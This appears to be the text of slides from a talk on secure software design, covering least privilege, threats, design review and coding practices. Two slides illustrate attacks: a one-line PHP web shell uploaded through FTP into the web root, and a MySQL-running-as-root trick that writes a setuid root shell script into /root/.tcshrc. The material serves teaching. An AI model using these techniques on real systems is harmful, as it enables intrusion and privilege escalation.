cell phones • bio-facilities • Sodas, junk food, and coffee • Welcome to the No Smoking State
who are you? • where are you from? • what do you do? • Emacs or vi?
Warm Fuzzies • Secure Design and Implementation • Wordage
Security Concepts • Vetting Software • Design Strategy • Developer practices • Coding Practices • Operational Practices
trust • transitive trust
principle of least privilege • enumerating badness • “best block: not be there” • -- Mr. Miyage
threats • vulnerabilities • risks
confidentiality • integrity • availability
protect what you can • detect what you can’t prevent
a security mechanism is design to protect against a specific finite set of attacks. • It usually fails gloriously when modified or used for other purposes.
don’t rely on the environment for protection • don’t rely on good behavior • don’t rely on things you can’t control
ftproot == wwwroot • webuser == o+w
upload php via ftp • <? passthru($cmd); ?> • upload backdoor code • compile and execute via http • http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c • voila! shell on web server
bugzilla talking to mysql • mysql running as root • mysql username/password stored script
create table with text field • insert: • #!/bin/sh • cp /bin/sh /tmp/.rootsh • chmod 4755 /tmp/.rootsh • rm -f /root/.tcshrc • query: SELECT ... INTO ‘/root/.tchsrc’ • wait for someone to “su -”
What is it supposed to do? • How does it work? • What side effects are there? • How is it deployed and maintained?
How does it fail? • What is the risk? • Can it be mitigated?
understanding • caring • under-budget
It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily. • -- Eric S. Raymond, The Art of Unix Usability
goals • requirements • design • review
what is the end result? • what problem trying to solve? • *not* how it is implemented
security • usability • performance • environmental
support • deployment • political • external
as simple as possible to meet the requirements • add requirements if apparent during design • be prepared to change when requirements can’t be met
for each security control • what threat is addressed? • Really?
The three virtues of a programmer are laziness, impatience, and hubris. • -- Larry Wall
Group permissions and accounts • Code Safety • Test Environment • Regression Testing
bounds checking • input validation • no client-side trust • error checking
sql injection • cross-site scripting • credential handling • data mapping • logging
Server accounts and permissions • handling credentials • accountability • software maintenance • documentation • testing and debugging